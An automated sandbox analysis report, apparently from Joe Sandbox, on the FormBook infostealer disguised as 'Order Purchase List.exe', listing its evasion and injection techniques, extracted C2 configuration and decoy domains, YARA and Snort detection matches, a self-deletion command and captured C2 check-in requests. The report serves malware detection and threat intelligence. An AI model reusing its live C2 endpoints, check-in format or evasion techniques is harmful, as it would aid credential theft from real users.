Play interactive tour

Edit tour

Windows Analysis Report Order Purchase List.exe

Overview

General Information

Sample Name:	Order Purchase List.exe
Analysis ID:	499414
MD5:	903febb63c1a5afa29741401eac430af
SHA1:	3b6d8067630bc891b469ad5d367880e602aaa6a8
SHA256:	4a32f26bf573c5407014a41c8c54f84afa0041cce8c2b65f147527608cb23598
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Sample uses process hollowing technique

Uses netstat to query active network connections and open ports

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Self deletion via cmd delete

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

Order Purchase List.exe (PID: 4524 cmdline: 'C:\Users\user\Desktop\Order Purchase List.exe' MD5: 903FEBB63C1A5AFA29741401EAC430AF)

Order Purchase List.exe (PID: 5344 cmdline: {path} MD5: 903FEBB63C1A5AFA29741401EAC430AF)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

NETSTAT.EXE (PID: 4856 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)

cmd.exe (PID: 388 cmdline: /c del 'C:\Users\user\Desktop\Order Purchase List.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hottorchlighter.com/gnui/"], "decoy": ["himalayanwanderwoods.com", "finvi.guru", "iphone13promax.show", "rpfcomunicacao.com", "inemilia.com", "blboutiqueexchange.com", "sukiller.com", "tzwa.net", "noemiklein.com", "upscalepklptp.xyz", "unboxk.com", "greatamericanlandworks.com", "bataperu.com", "estebanacostapeugeot.com", "gombc-a02.com", "642541.com", "13f465.com", "jskswj.com", "hibar.xyz", "eltool.net", "theblackholelab.com", "portcities.website", "kfvmj.com", "ausawarenesscodeday.com", "inmobiliarianelecasa.com", "supportowlph.com", "dj6688i.com", "mujinrj.com", "adamelsouk.com", "mangiamosgt.com", "tokomodern.xyz", "transfersound.com", "shinei-ako-recruit.com", "z9l2.com", "apqcwl.com", "everythingsamsung.com", "torunavukatlikburosu.com", "szfalr.com", "csyein.com", "momentbetong.com", "zkimax.com", "wiggytv.xyz", "jaguarshield.com", "drmitnick.com", "xc6315.com", "pacelicensedelectrician.com", "bigbigsea.com", "712861.com", "hcato.xyz", "things4cars.xyz", "moukse.com", "heyprogrammers.com", "hualisudi.com", "elcyork.com", "icpbunny.com", "goldeasolutions.com", "kidsbydesign.online", "auxiliacapitalpartnersllc.com", "silverbackfinance.com", "hitsduo.com", "marganneglasser.com", "kare-furniture.com", "inatividigitali.com", "maxicashprogtr.xyz"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ae9:$sqlite3step: 68 34 1C 7B E1 0x6bfc:$sqlite3step: 68 34 1C 7B E1 0x6b18:$sqlite3text: 68 38 2A 90 C5 0x6c3d:$sqlite3text: 68 38 2A 90 C5 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ae9:$sqlite3step: 68 34 1C 7B E1 0x6bfc:$sqlite3step: 68 34 1C 7B E1 0x6b18:$sqlite3text: 68 38 2A 90 C5 0x6c3d:$sqlite3text: 68 38 2A 90 C5 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.Order Purchase List.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
10.2.Order Purchase List.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
10.2.Order Purchase List.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
10.2.Order Purchase List.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
10.2.Order Purchase List.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
10.2.Order Purchase List.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.hottorchlighter.com/gnui/"], "decoy": ["himalayanwanderwoods.com", "finvi.guru", "iphone13promax.show", "rpfcomunicacao.com", "inemilia.com", "blboutiqueexchange.com", "sukiller.com", "tzwa.net", "noemiklein.com", "upscalepklptp.xyz", "unboxk.com", "greatamericanlandworks.com", "bataperu.com", "estebanacostapeugeot.com", "gombc-a02.com", "642541.com", "13f465.com", "jskswj.com", "hibar.xyz", "eltool.net", "theblackholelab.com", "portcities.website", "kfvmj.com", "ausawarenesscodeday.com", "inmobiliarianelecasa.com", "supportowlph.com", "dj6688i.com", "mujinrj.com", "adamelsouk.com", "mangiamosgt.com", "tokomodern.xyz", "transfersound.com", "shinei-ako-recruit.com", "z9l2.com", "apqcwl.com", "everythingsamsung.com", "torunavukatlikburosu.com", "szfalr.com", "csyein.com", "momentbetong.com", "zkimax.com", "wiggytv.xyz", "jaguarshield.com", "drmitnick.com", "xc6315.com", "pacelicensedelectrician.com", "bigbigsea.com", "712861.com", "hcato.xyz", "things4cars.xyz", "moukse.com", "heyprogrammers.com", "hualisudi.com", "elcyork.com", "icpbunny.com", "goldeasolutions.com", "kidsbydesign.online", "auxiliacapitalpartnersllc.com", "silverbackfinance.com", "hitsduo.com", "marganneglasser.com", "kare-furniture.com", "inatividigitali.com", "maxicashprogtr.xyz"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Order Purchase List.exe	Virustotal: Detection: 34%	Perma Link
Source: Order Purchase List.exe	Metadefender: Detection: 40%	Perma Link
Source: Order Purchase List.exe	ReversingLabs: Detection: 67%

Yara detected FormBook

Show sources

Source: Yara match	File source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: www.hottorchlighter.com/gnui/	Avira URL Cloud: Label: malware
Source: http://www.hottorchlighter.com/gnui/?D81Ltve=cDQQZHb5+agf8NQlScjGsSnQujRDxgY7AdRX5ePPfv8dvEhK3bFAIhRBnhIsPLeiQwdj&v0=mjfD3V_	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Show sources

Source: Order Purchase List.exe

Joe Sandbox ML: detected

Source: 10.2.Order Purchase List.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: Order Purchase List.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Order Purchase List.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: netstat.pdbGCTL source: Order Purchase List.exe, 0000000A.00000002.396574659.0000000001240000.00000040.00020000.sdmp
Source:	Binary string: netstat.pdb source: Order Purchase List.exe, 0000000A.00000002.396574659.0000000001240000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Order Purchase List.exe, 0000000A.00000002.396916075.00000000017AF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000013.00000003.395986362.00000000004F0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Order Purchase List.exe, 0000000A.00000002.396916075.00000000017AF000.00000040.00000001.sdmp, NETSTAT.EXE

Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 4x nop then pop esi	10_2_00415852
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 4x nop then pop edi	10_2_004162ED
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 4x nop then pop edi	19_2_02B062ED
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 4x nop then pop esi	19_2_02B05852

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49829 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49829 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49829 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49830 -> 68.178.221.206:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49830 -> 68.178.221.206:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49830 -> 68.178.221.206:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 154.23.204.56 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.hottorchlighter.com
Source: C:\Windows\explorer.exe	Domain query: www.auxiliacapitalpartnersllc.com
Source: C:\Windows\explorer.exe	Domain query: www.bigbigsea.com
Source: C:\Windows\explorer.exe	Domain query: www.inatividigitali.com
Source: C:\Windows\explorer.exe	Network Connect: 104.21.44.253 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 68.178.221.206 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.greatamericanlandworks.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Uses netstat to query active network connections and open ports

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.hottorchlighter.com/gnui/

Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /gnui/?D81Ltve=MSRjHgM9j7I5HOqdL19ZieQAx0QZYnhjbVtYOT6RDGM9GDKuXhbXwP3ESIufbr/Me9Gt&v0=mjfD3V_ HTTP/1.1Host: www.inatividigitali.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gnui/?D81Ltve=jxkSMADL8om04CnCt2uvg3koohdaHD/94Z7CDjzCNfrBt1nbgpVJnnhJbuZar5zysKNA&v0=mjfD3V_ HTTP/1.1Host: www.auxiliacapitalpartnersllc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gnui/?D81Ltve=cDQQZHb5+agf8NQlScjGsSnQujRDxgY7AdRX5ePPfv8dvEhK3bFAIhRBnhIsPLeiQwdj&v0=mjfD3V_ HTTP/1.1Host: www.hottorchlighter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gnui/?D81Ltve=+ILGKZDievfdlhE08A6+0Ox9ZT8Pbvv5JFHshEbNzSpcbgaG6QnGXyVZrWQJJYTOfSqp&v0=mjfD3V_ HTTP/1.1Host: www.bigbigsea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 08 Oct 2021 09:24:18 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
